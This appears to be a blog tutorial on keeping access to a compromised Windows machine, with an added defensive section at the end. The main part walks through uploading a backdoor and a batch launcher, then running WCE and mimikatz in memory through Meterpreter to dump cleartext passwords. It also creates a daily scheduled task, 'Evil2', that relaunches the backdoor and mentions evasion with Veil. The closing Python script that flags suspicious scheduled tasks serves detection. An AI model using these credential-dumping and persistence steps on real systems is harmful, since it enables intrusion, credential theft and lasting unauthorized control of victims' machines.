Schedule Task in Windows after Exploitation
Published on 2013-10-04 17:50:00 UTC by nirav desai
Recently at DerbyCon, mubix & carnal0wnage presented "Windows Attacks: AT is the new black". It's a really great presentation. You can find it here. So I will put their method here.
After getting a meterpreter shell, we have to maintain access to the shell. You can use the meterpreter backdoor and the persistent backdoor, but most of the time they will be caught by AV. You can create a FUD payload using Veil. We can also create a scheduled task for our backdoor.
First create a batch file and put the following code in it:
@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"
Then upload your backdoor and the batch file you created. Adjust the path in the batch file to match the path where you uploaded the backdoor.
Get clear text password:
The following are different methods to get the clear text password on Windows.
(1) Using mimikatz or wce, get the clear text password of the victim.
(4) You can use wce & mimikatz in memory without uploading the binary.
(a) WCE in memory:
cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt
(b) Mimikatz in memory:
cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
So till now I have uploaded one batch file and the backdoor, and got the clear text password.
Now we are going to schedule our backdoor. We are going to use the schtasks command. For details about the schtasks options, visit here. In this tutorial I schedule my backdoor daily at 22:16, so every day at 22:16 my backdoor will be executed and I will get a shell.
C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat\"" /ST 22:16:00
It will ask you to enter the password, which we got before.
You can also use different options like ONIDLE, ONLOGON, and ONSTART, and execute a different binary according to your need.
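From the defender's side, a task like Evil2 stands out in a scheduled-task inventory because its action is a script inside a user profile. The following is an added example, not part of the original post: it reviews CSV in the style of `schtasks /query /fo CSV /v`, assuming a trimmed set of columns, constructed sample rows, and two heuristics chosen for illustration.

```python
import csv
import io
import re

# Constructed sample, trimmed to four of the columns printed by
# `schtasks /query /fo CSV /v`. Not real output from any host.
SAMPLE_CSV = r'''"TaskName","Task To Run","Run As User","Schedule Type"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly"
"\Evil2","""C:\Documents and Settings\nirav\Desktop\sch.bat""","nirav","Daily"
"\Updater","C:\Program Files\Vendor\update.exe /silent","SYSTEM","At logon time"
"\tmpjob","C:\Users\bob\AppData\Local\Temp\run.cmd","bob","On idle"
'''

# Assumed heuristics: actions under a user profile or a Temp directory,
# and actions that launch a script rather than an installed binary.
USER_WRITABLE = re.compile(
    r'\\(documents and settings|users)\\[^\\]+\\|\\temp\\', re.I)
SCRIPT_EXT = re.compile(r'\.(bat|cmd|vbs|js|ps1)\b', re.I)


def review_tasks(csv_text):
    """Return (task name, run-as user, reasons) for each suspicious task."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":
            continue  # skip a header row if it repeats mid-output
        # Drop the wrapping quotes used for paths that contain spaces.
        action = row["Task To Run"].strip().strip('"')
        reasons = []
        if USER_WRITABLE.search(action):
            reasons.append("action in user-writable path")
        if SCRIPT_EXT.search(action):
            reasons.append("action is a script")
        if reasons:
            findings.append((row["TaskName"], row["Run As User"], reasons))
    return findings


if __name__ == "__main__":
    for name, user, reasons in review_tasks(SAMPLE_CSV):
        print(f"{name} (runs as {user}): {', '.join(reasons)}")
```

Flagged tasks are leads for review, not verdicts; legitimate software sometimes schedules scripts from a user profile.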